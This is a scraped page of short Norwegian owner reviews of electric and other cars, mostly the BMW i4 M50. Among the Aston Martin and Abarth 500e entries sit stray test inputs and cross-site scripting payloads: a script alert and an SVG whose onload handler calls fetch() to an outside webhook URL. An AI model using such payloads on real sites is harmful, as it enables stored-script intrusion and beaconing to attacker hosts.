Vurdert av 8 mercedes
BMW i4 M50 (2025)
Fantastisk kjøremaskin. Meget fin "bil". Stor forskjell i opplevd kvalitet ift. Tesla og div. Kina-modeller.
BMW i4 M50 (2024)
Første elbil for meg. Fungerer utmerket, mye effekt til en relativt lav pris. Forbruk i snitt etter ett år 16,1. det er med to turer med campingvogn.
BMW i4 M50 (2024)
Kjøreglede og kvalitet. Superrask og samtidig enkel å kjøre. Lavt forbruk, grei rekkevidde. Veldig fornøyd.
BMW i4 M50 (2024)
MEGET god og kjøre -kjøreglede ; mye elektroniske feil , noe trang i baksetet, prisfall etter 1,5 år er meget stort.
BMW i4 M50 (2023)
Dette er ikke en praktisk familiebil med stor plass, ferdig diskutert! Det er en utrolig morsom entusiast bil som du blir glad av å kjøre. Heftige ytelser og ekte sportslig BMW kjøreglede uten alt
BMW i4 M50 (2023)
En herlig bil å eie og kjøre.
BMW i4 M50 (2023)
Det kan knappest bli bedre...
BMW i4 M50 (2022)
God bil og definitivt mye for pengene. Litt høyt verditap, men stabile driftsutgifter.
BMW i4 M50 (2022)
Bilen oppleves sporty. Utrolig rask. Anbefales!
BMW i4 M50 (2022)
Meget fornøyd med bilen. Flott førermiljø, herlige seter og kjøreegenskaper. Meget bra head-up display, skjermer og infotainment. Etter mitt syn en nytelse for øyet, utvendig og innvendig. Bilen
BMW i4 M50 (2022)
Har hatt en del biler fra små morsomme (VW, Mini, Focus, i3, Peugot, Nissan) til luksus og performance (Jaguar V8, Land Rover, Rover V8, MG, Ford V8), men denne er best av alle hittil. Komfort, tempo
BMW i4 M50 (2022)
Meget fornøyd med min i4 M50. Den er morsom å kjøre og liker utformingen på skjermer, seter og utseendet. Kjører man Taycan og denne etter hverandre merker man at Taycan er hakket bedre å kjøre
BMW i4 M50 (2022)
Dette er kvalitet og kjøre glede til en veldig overkommelig pris. Det er det nærmeste du kommer en stasjonsvogn uten at det er det. En diskre design perle
BMW i4 M50 (2022)
Gammeldags bil fra et gammeldags bilmerke som ikke yter særlig god kundeservice. God styring og hjuloppheng. Elektronikk, sensorer og programvare er elendig. Ikke premium.
BMW i4 M50 (2022)
Positivt : Gode seter, infotainmentsystem, grei ladehastighet og premiumfølelse. Negativt ; Merkelig lite engasjerende kjøreopplevelse, mye ligger vel i den dårlige el. servo styringen som gir veld
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.